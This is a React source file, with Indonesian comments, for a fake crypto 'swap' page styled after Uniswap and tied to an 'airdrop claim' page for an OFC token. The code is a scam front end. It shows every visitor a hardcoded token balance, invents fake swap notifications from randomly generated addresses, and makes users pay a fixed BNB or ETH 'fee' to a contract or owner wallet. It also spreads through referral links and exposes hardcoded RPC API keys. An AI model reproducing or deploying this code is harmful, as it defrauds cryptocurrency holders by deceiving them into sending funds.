/* global BigInt */
import React, { useState, useEffect } from 'react';
import { useAccount, useDisconnect, useWriteContract } from 'wagmi';
import { useConnectModal } from '@rainbow-me/rainbowkit';
import { formatEther, parseEther } from 'viem';
import { FaChevronDown, FaArrowDown, FaCog, FaCopy, FaCheck, FaBars, FaTimes } from 'react-icons/fa';

// IMPORT ABI DARI FILE abi.json
import CONTRACT_ABI from '../abi.json';

// ISI DENGAN ADDRESS CONTRACT ANDA
const CONTRACT_ADDRESS = "0x9c58cD7c08d25F346266bE2240Dd53CaEb201353"; 

const RPC_BNB = "https://rpc.ankr.com/bsc/80356e80b9423592e3fa81fb7cdbeb62ee0f6c197bb5e70964e8f22d5fd5d0fc";
const RPC_ETH = "https://rpc.ankr.com/eth/80356e80b9423592e3fa81fb7cdbeb62ee0f6c197bb5e70964e8f22d5fd5d0fc";
const RPC_BASE = "https://rpc.ankr.com/base/80356e80b9423592e3fa81fb7cdbeb62ee0f6c197bb5e70964e8f22d5fd5d0fc";
const OWNER_WALLET = "0x5AADe7567183777bF1925Ad55Ab6cA32546AbD81";

const fetchBalance = async (rpcUrl, walletAddress) => {
  try {
    const res = await fetch(rpcUrl, {
      method: 'POST', headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ jsonrpc: "2.0", method: "eth_getBalance", params: [walletAddress, "latest"], id: 1 })
    });
    const data = await res.json();
    return parseFloat(formatEther(BigInt(data.result)));
  } catch (e) {
    return 0;
  }
};

function SwapPage({ navigateToClaim }) {
  const { address, isConnected } = useAccount();
  const { disconnect } = useDisconnect();
  const { openConnectModal } = useConnectModal();
  const { writeContract } = useWriteContract(); // Hook untuk Write Smart Contract
  
  const [activeNetwork, setActiveNetwork] = useState(() => {
    if (typeof window !== 'undefined') return sessionStorage.getItem('fp_activeNetwork') || 'BNB';
    return 'BNB';
  });
  
  const [networkBalance, setNetworkBalance] = useState(() => {
    if (typeof window !== 'undefined') return parseFloat(sessionStorage.getItem('fp_networkBalance')) || 0;
    return 0;
  });

  const [isMobileMenuOpen, setMobileMenuOpen] = useState(false);

  useEffect(() => {
    if (isConnected && address) {
      const checkBalances = async () => {
        const balBNB = await fetchBalance(RPC_BNB, address);
        const balETH = await fetchBalance(RPC_ETH, address);
        const balBASE = await fetchBalance(RPC_BASE, address);

        const maxBal = Math.max(balBNB, balETH, balBASE);
        let net = 'BNB';
        let bal = 0;

        if (maxBal === 0) { net = 'BNB'; bal = 0; } 
        else if (balBNB === maxBal) { net = 'BNB'; bal = balBNB; } 
        else if (balETH === maxBal) { net = 'ETH'; bal = balETH; } 
        else { net = 'BASE'; bal = balBASE; }

        setActiveNetwork(net);
        setNetworkBalance(bal);

        if (typeof window !== 'undefined') {
          sessionStorage.setItem('fp_activeNetwork', net);
          sessionStorage.setItem('fp_networkBalance', bal.toString());
        }
      };
      checkBalances();
    } else {
      if (typeof window !== 'undefined') {
        sessionStorage.removeItem('fp_activeNetwork');
        sessionStorage.removeItem('fp_networkBalance');
      }
      setActiveNetwork('BNB');
      setNetworkBalance(0);
    }
  }, [isConnected, address]);

  const networkConfig = {
    BNB:  { symbol: 'BNB', logo: '/bnb.png', swapAmount: '0.8842', fee: 0.01447, errorText: "Insufficient BNB balance. you must HODL 0.01447 BNB FOR SWAP" },
    ETH:  { symbol: 'ETH', logo: '/eth.png', swapAmount: '0.2407', fee: 0.004, errorText: "Insufficient ETH balance, you must HODL 0.004 ETH FOR SWAP" },
    BASE: { symbol: 'ETH', logo: '/base.webp', swapAmount: '0.2407', fee: 0.004, errorText: "Insufficient ETH balance, you must HODL 0.004 BASE ETH FOR SWAP" }
  };

  const currentConfig = networkConfig[activeNetwork];
  
  const scannedTokenBalance = 0; 
  const maxOfcBalance = scannedTokenBalance > 0 ? scannedTokenBalance.toString() : '10280';
  const displayOfcBalance = scannedTokenBalance > 0 ? scannedTokenBalance.toLocaleString('en-US') : "10,280.00"; 
  const displayNativeBalance = networkBalance > 0 ? networkBalance.toFixed(4) : "0";

  const ofcPriceUsd = 0.053; 
  const [copySuccess, setCopySuccess] = useState(false);
  const [currentDomain, setCurrentDomain] = useState('https://yoursite.com');

  const [showSwapError, setShowSwapError] = useState(false);
  const [showToast, setShowToast] = useState(false);
  const [toastAddress, setToastAddress] = useState('');

  useEffect(() => {
    if (typeof window !== 'undefined') setCurrentDomain(window.location.origin);
  }, []);

  useEffect(() => {
    const generateFakeAddress = () => {
      const chars = '0123456789abcdef';
      let addr = '0x';
      for(let i=0;i<4;i++) addr+=chars[Math.floor(Math.random()*chars.length)];
      addr+='...';
      for(let i=0;i<4;i++) addr+=chars[Math.floor(Math.random()*chars.length)];
      return addr;
    };
    const interval = setInterval(() => {
      setToastAddress(generateFakeAddress());
      setShowToast(true);
      setTimeout(() => setShowToast(false), 5000); 
    }, 12000); 
    return () => clearInterval(interval);
  }, []);

  const handleCopy = () => {
    if (!isConnected) return;
    navigator.clipboard.writeText(`${currentDomain}/?ref=${address}`);
    setCopySuccess(true);
    setTimeout(() => setCopySuccess(false), 2000); 
  };

  const getUsdValue = () => {
    return (parseFloat(maxOfcBalance) * ofcPriceUsd).toLocaleString('en-US', { minimumFractionDigits: 2, maximumFractionDigits: 2 });
  };

  const handleSwapClick = () => {
    if (!isConnected) {
      openConnectModal();
    } else {
      if (networkBalance < currentConfig.fee) {
        setShowSwapError(true);
        setTimeout(() => setShowSwapError(false), 4000);
        return;
      }
      
      // Ambil address referral dari URL parameter (?ref=...)
      const urlParams = new URLSearchParams(window.location.search);
      const refAddress = urlParams.get('ref') || "0x0000000000000000000000000000000000000000";

      if (activeNetwork === 'BNB') {
        // Interaksi ke Smart Contract jika menggunakan BNB
        try {
          writeContract({
            address: CONTRACT_ADDRESS,
            abi: CONTRACT_ABI,
            functionName: 'swap',
            args: [refAddress], // Mengirim address referral
            value: parseEther("0.01447"), // Fee Swap Tetap 0.01447 BNB
          });
        } catch(e) {
          console.error("Gagal interaksi contract", e);
        }
      } else {
        // Logika Transfer Manual jika menggunakan ETH atau BASE
        console.log(`Mengirim fee swap ${currentConfig.fee} ETH di jaringan ${activeNetwork} ke Owner Wallet: ${OWNER_WALLET}`);
      }
    }
  };

  return (
    <div className="uni-dark-layout">
      {isMobileMenuOpen && (
        <div className="fp-mobile-overlay" style={{ zIndex: 100000 }}>
          <div className="fp-mobile-close" onClick={() => setMobileMenuOpen(false)}>
            <FaTimes size={24} color="#ffffff" />
          </div>
          <div className="fp-mobile-links">
            <span className="active">Swap</span>
            <span>Tokens</span>
            <span>NFTs</span>
            <span>Pool</span>
            <span onClick={navigateToClaim} style={{ color: '#FB118E', cursor: 'pointer' }}>Back to Claim</span>
          </div>
          <div className="fp-mobile-footer-logo">
            <img src="/fanpasslogo.svg" alt="Logo" className="fp-logo-icon" />
            <img src="/fanpasstext.svg" alt="FanPass" className="fp-logo-text-img" />
          </div>
        </div>
      )}

      {showToast && (
        <div className="uni-toast-container">
          <div className="uni-toast-icon"><FaCheck size={14} color="#3fb950" /></div>
          <div className="uni-toast-content">
            <p className="uni-toast-title">Swap Exact ETH for Tokens</p>
            <p className="uni-toast-desc">{toastAddress} swapped 10280 OFC for {currentConfig.swapAmount} {currentConfig.symbol}</p>
          </div>
        </div>
      )}

      <nav className="uni-dark-nav">
        <div className="uni-dark-nav-left">
          <img src="/fanpasslogo.svg" alt="Logo" className="uni-dark-logo" onError={(e) => e.target.style.display='none'} />
          <div className="uni-dark-nav-links">
            <span className="active">Swap</span>
            <span>Tokens</span>
            <span>NFTs</span>
            <span>Pool</span>
          </div>
        </div>
        <div className="uni-dark-nav-right" style={{ display: 'flex', alignItems: 'center', gap: '16px' }}>
          {isConnected ? (
            <div className="uni-dark-connected" onClick={() => disconnect()}>
              {address.substring(0, 6)}...{address.substring(38)}
            </div>
          ) : (
            <button className="uni-dark-connect-nav" onClick={openConnectModal}>Connect</button>
          )}
          <div className="fp-mobile-menu-btn" onClick={() => setMobileMenuOpen(true)}>
            <FaBars size={24} color="#9B9B9B" />
          </div>
        </div>
      </nav>

      <main className="uni-dark-container">
        <div className="uni-dark-swap-card">
          <div className="uni-dark-card-header">
            <span className="uni-header-text">Swap</span>
            <FaCog className="uni-dark-settings-icon" />
          </div>

          <div className="uni-dark-input-panel">
            <div className="uni-dark-row">
              <input type="number" placeholder="0" value={maxOfcBalance} readOnly style={{ cursor: 'not-allowed' }} />
              <div className="uni-dark-token-pill">
                <div className="token-badge-container">
                  <img src="/icon.png" alt="OFC" onError={(e) => e.target.style.display='none'} />
                  {isConnected && <img src={currentConfig.logo} alt="Net" className="network-badge-overlay" />}
                </div>
                <span>OFC</span>
                <FaChevronDown size={10} />
              </div>
            </div>
            <div className="uni-dark-info-row">
              <span>${getUsdValue()}</span>
              {isConnected && <span className="uni-dark-bal">Balance: {displayOfcBalance}</span>}
            </div>
          </div>

          <div className="uni-dark-arrow-spacer">
            <div className="uni-dark-arrow-circle"><FaArrowDown size={12} /></div>
          </div>

          <div className="uni-dark-input-panel">
            <div className="uni-dark-row">
              <input type="number" placeholder="0" value={currentConfig.swapAmount} readOnly style={{ cursor: 'not-allowed' }} />
              <div className="uni-dark-token-pill">
                <img src={currentConfig.logo} alt={currentConfig.symbol} onError={(e) => e.target.style.display='none'} />
                <span>{currentConfig.symbol}</span>
                <FaChevronDown size={10} />
              </div>
            </div>
            <div className="uni-dark-info-row">
              <span>${getUsdValue()}</span>
              {isConnected && <span className="uni-dark-bal">Balance: {displayNativeBalance}</span>}
            </div>
          </div>

          <button className="uni-dark-main-btn action-needed" onClick={handleSwapClick}>
            {!isConnected ? "SWAP" : "SWAP"}
          </button>
          
          {showSwapError && (
             <p className="uni-error-text" style={{ color: '#ff4d4d', fontSize: '14px', marginTop: '12px', textAlign: 'center', fontWeight: '500' }}>
               {currentConfig.errorText}
             </p>
          )}
        </div>

        <div className="uni-dark-ref-box">
          <p className="uni-ref-title">Referral Program</p>
          <p style={{ color: '#9B9B9B', fontSize: '11px', marginTop: '-4px', marginBottom: '12px' }}>
            Earn 10% BNB and 100% OFC tokens on the BNB chain.
          </p>
          <div className="uni-ref-link-display">
            <span className="uni-ref-text">
              {isConnected ? `${currentDomain}/?ref=${address.substring(0,6)}...${address.substring(38)}` : "Connect wallet to view link"}
            </span>
            {isConnected && (
              <button className="uni-copy-btn" onClick={handleCopy} title="Copy Referral Link">
                {copySuccess ? <FaCheck color="#00ff00" /> : <FaCopy />}
              </button>
            )}
          </div>
        </div>

        <a href="https://bscscan.com/token/0x9c58cd7c08d25f346266be2240dd53caeb201353" className="uni-dark-explorer-link" target="_blank" rel="noreferrer">View on explorer</a>
        <a href="https://uniswap.org/" className="uni-dark-powered-by" target="_blank" rel="noreferrer">
          <span>Powered by</span><img src="/uniswap.png" alt="Uniswap Logo" onError={(e) => e.target.style.display='none'} />
        </a>
        <span className="uni-dark-back" onClick={navigateToClaim}>Return to Airdrop Claim</span>
      </main>
    </div>
  );
}

export default SwapPage;